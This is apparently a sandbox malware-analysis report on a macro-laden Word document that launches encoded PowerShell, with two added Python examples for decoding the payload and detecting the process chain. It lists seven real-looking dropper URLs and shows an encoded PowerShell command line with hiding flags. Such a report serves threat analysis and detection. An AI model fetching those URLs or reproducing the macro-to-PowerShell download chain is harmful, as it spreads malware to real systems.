Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 17:51

General

  • Target

    7dd794241f86015441d52f50b8115922_JaffaCakes118.doc

  • Size

    158KB

  • MD5

    7dd794241f86015441d52f50b8115922

  • SHA1

    2bca5c7ac169499193cc24637a83453481a718c0

  • SHA256

    5331ea5ad449f1402737c6cfe0f9249a582b986ec49743db376e79c59e59ecbb

  • SHA512

    cd4a0b5da102d664601f5001f8753100e01de12c20d3e17a21e8fa047c2caff6873344f18cf586509e6e4fb0a726db6f88839ee821037a641f15ae55c0a38cd5

  • SSDEEP

    1536:+iaqasrdi1Ir77zOH98Wj2gpngx+a93xRiqLE8ct2PU7eXKSSxH5ppJxUFW5:+0rfrzOH98ipgfkJxUFW5

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    • exe.dropper
      http://77yxx.com/b5rh/bZxS/
    • exe.dropper
      http://shahramookht.com/t1k12k7t/8jq/
    • exe.dropper
      http://www.aciitaly.com/adminer-master/gkI/
    • exe.dropper
      https://codelta.es/images/9S35FR/
    • exe.dropper
      https://burstoutloud.com/PPL/Hf/
    • exe.dropper
      https://targetin.com/Silder-1/naK/
    • exe.dropper
      http://dbestfishing.com.sg/67s/wfe/
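The extracted config says the payload stage is PowerShell (ps1) and that its only job is a list of candidate exe.dropper URLs. The encoded command line itself is not reproduced on this page, so the following is an added example (my own code, not tria.ge's extractor) that works on a constructed stand-in with two example.invalid URLs. It shows the decoding steps an analyst applies to such a command line: locate the base64 blob behind any prefix of -EncodedCommand (powershell.exe accepts -encod, as seen in the process tree, as well as -e, -enc and the -ec alias), decode base64 and then UTF-16LE, collapse 'ht' + 'tp' string concatenation so split URLs reassemble, collect the URLs, and repeat for nested encoded layers. The sample script downloads nothing; it only has the shape of a URL-list dropper.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (and the -ec
# alias), so the report's "powershell -encod <blob>" is the same switch as -e/-enc.
_FLAG_ALTS = "|".join(re.escape("encodedcommand"[:n]) for n in range(14, 0, -1)) + "|ec"
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:" + _FLAG_ALTS + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A URL ends at whitespace or at the quote/separator that closed the literal.
URL_RE = re.compile(r"https?://[^\s'\",;<>)}\]]+", re.IGNORECASE)
CONCAT_RE = re.compile(r"['\"]\s*\+\s*['\"]")  # 'ht' + 'tp' -> 'http'


def find_encoded_payloads(text: str) -> list[str]:
    """Return every base64 blob handed to an -EncodedCommand-style switch."""
    return ENC_FLAG_RE.findall(text)


def decode_payload(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text; malformed input yields ''."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def deobfuscate(script: str) -> str:
    """Collapse string literals glued together with '+' so a split URL reassembles."""
    return CONCAT_RE.sub("", script)


def extract_urls(cmdline: str, max_depth: int = 4) -> list[str]:
    """Collect URLs from the command line and from each nested encoded layer."""
    found: list[str] = []
    layer = [cmdline]
    for _ in range(max_depth + 1):
        next_layer: list[str] = []
        for text in layer:
            for url in URL_RE.findall(deobfuscate(text)):
                if url not in found:
                    found.append(url)
            next_layer.extend(s for s in map(decode_payload, find_encoded_payloads(text)) if s)
        if not next_layer:
            break
        layer = next_layer
    return found


def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed stand-in for the report's blob (the real one is not on the page).
# It downloads nothing; it only has the shape of a URL-list dropper: try each
# candidate URL in turn and stop at the first that works.
SAMPLE_SCRIPT = (
    "$u = @('http://dropper-one.example.invalid/a1/', "
    "'https://dropper-two.exa' + 'mple.invalid/b2/');"
    "foreach ($x in $u) { try { $wc = New-Object Net.WebClient; break } catch {} }"
)
SAMPLE_CMDLINE = "powershell -encod " + _encode(SAMPLE_SCRIPT)
# Second constructed layer: an outer -e wrapper around the first command line.
NESTED_CMDLINE = "powershell -nop -w hidden -e " + _encode(SAMPLE_CMDLINE)

if __name__ == "__main__":
    for url in extract_urls(NESTED_CMDLINE):
        print(url)
```

The URL pattern deliberately stops at quotes, commas and semicolons, because in a dropper script those are the characters that close the literal; a URL that legitimately contains a comma would be cut there, so treat the output as a triage list and confirm it against the decoded script.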

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7dd794241f86015441d52f50b8115922_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
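The tree above shows WINWORD.EXE starting its normal splwow64.exe print helper and a powershell.exe carrying an encoded command, which is what the "Process spawned unexpected child process" signature flags. The following is an added detection example (my own code, not tria.ge's signature logic) run over constructed process-creation events that borrow the PIDs and paths from this report but invent the timestamps and the encoded blob. It flags (1) any child of an Office application other than the print proxy, (2) PowerShell started with any prefix of -EncodedCommand, recording evasion switches such as -nop and -w hidden, and (3) as a heuristic assumption of mine, an encoded PowerShell whose parent is not Office but which starts within 120 seconds of an Office process, since a launch through WMI or COM gives it a different parent and hides the real chain.

```python
import base64
import os
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# splwow64.exe is the 32-bit print-spooler proxy; 32-bit Office on 64-bit
# Windows starts it routinely, which is why the report does not flag it.
BENIGN_OFFICE_CHILDREN = {"splwow64.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Any unambiguous prefix of -EncodedCommand, plus the -ec alias.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:" + "|".join("encodedcommand"[:n] for n in range(14, 0, -1)) + r"|ec)\s",
    re.IGNORECASE)
EVASION_RE = re.compile(
    r"-(?:noprofile|nop|noninteractive|noni|w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|xec|p)\s+bypass)\b",
    re.IGNORECASE)
OFFICE_WINDOW_S = 120.0  # assumption: correlate within roughly one sandbox run


@dataclass(frozen=True)
class ProcEvent:
    ts: float      # seconds since the start of the trace (constructed)
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _name(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def triage(events: list[ProcEvent]) -> list[Finding]:
    """Apply the three checks to every event, in time order."""
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for e in sorted(events, key=lambda x: x.ts):
        child = _name(e.image)
        parent = by_pid.get(e.ppid)
        pname = _name(parent.image) if parent else ""
        if pname in OFFICE_APPS and child not in BENIGN_OFFICE_CHILDREN:
            findings.append(Finding(e.pid, "office_unexpected_child", f"{pname} -> {child}"))
        if child in POWERSHELL and ENC_FLAG_RE.search(e.cmdline):
            flags = sorted(m.group(0).lower() for m in EVASION_RE.finditer(e.cmdline))
            findings.append(Finding(e.pid, "encoded_powershell",
                                    "evasion flags: " + (", ".join(flags) or "none")))
            # WMI/COM launches give PowerShell a parent other than the Office process,
            # so fall back to time correlation when the PPID does not point at Office.
            if pname not in OFFICE_APPS:
                recent = [o for o in events
                          if _name(o.image) in OFFICE_APPS and 0 <= e.ts - o.ts <= OFFICE_WINDOW_S]
                if recent:
                    findings.append(Finding(e.pid, "encoded_powershell_near_office_start",
                                            f"office pids: {[o.pid for o in recent]}"))
    return findings


# Harmless constructed blob standing in for the report's encoded command.
_BLOB = base64.b64encode("Write-Output 'constructed'".encode("utf-16le")).decode("ascii")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events mirroring the report's tree (PIDs borrowed, timings invented).
EVENTS = [
    ProcEvent(0.0, 1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1.0, 2368, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"'),
    ProcEvent(4.0, 2184, 2368, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(9.0, 2672, 2368, PS_PATH, "powershell -nop -w hidden -encod " + _BLOB),
    ProcEvent(300.0, 3100, 1000, PS_PATH, r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]
# Same trace, but PowerShell's parent is not in it (as after a WMI launch).
EVENTS_INDIRECT = [ev for ev in EVENTS if ev.pid != 2672] + [
    ProcEvent(9.0, 2672, 4444, PS_PATH, "powershell -encod " + _BLOB),
]

if __name__ == "__main__":
    for f in triage(EVENTS) + triage(EVENTS_INDIRECT):
        print(f.pid, f.rule, f.detail)
```

The benign scheduled backup (PID 3100) produces no finding even though it is PowerShell under explorer.exe, because the rules key on the Office parent and on the encoded-command switch rather than on PowerShell alone; the time-window rule is the noisiest of the three and is meant for correlation, not for blocking.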

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fcacdf583558189c0f11b16d1b8b592b

      SHA1

      e40bfbd8f8d38b687ef71f8a1b7d3e14769e5020

      SHA256

      ff9ac5e367a9542c11156a4e1c14bb57d63b8da9b13254659af304bd1bda200e

      SHA512

      1734c26c317b9688d7e99c9a7301f72355357f033a67ef7d24e08e81d44c363f04bacb1848360ecf802c372de1d24a13d11a7cda6723ad7f8ac7b984c6061b81

    • memory/2368-24-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-0-0x000000002FC21000-0x000000002FC22000-memory.dmp

      Filesize

      4KB

    • memory/2368-6-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-7-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-20-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-19-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-18-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-17-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-16-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-15-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-14-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-13-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-12-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-11-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-10-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-9-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-2-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-8-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-28-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-27-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-26-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-25-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-23-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-22-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-21-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-31-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-30-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-36-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-64-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2368-44-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-45-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2672-38-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB

    • memory/2672-37-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

      Filesize

      2.9MB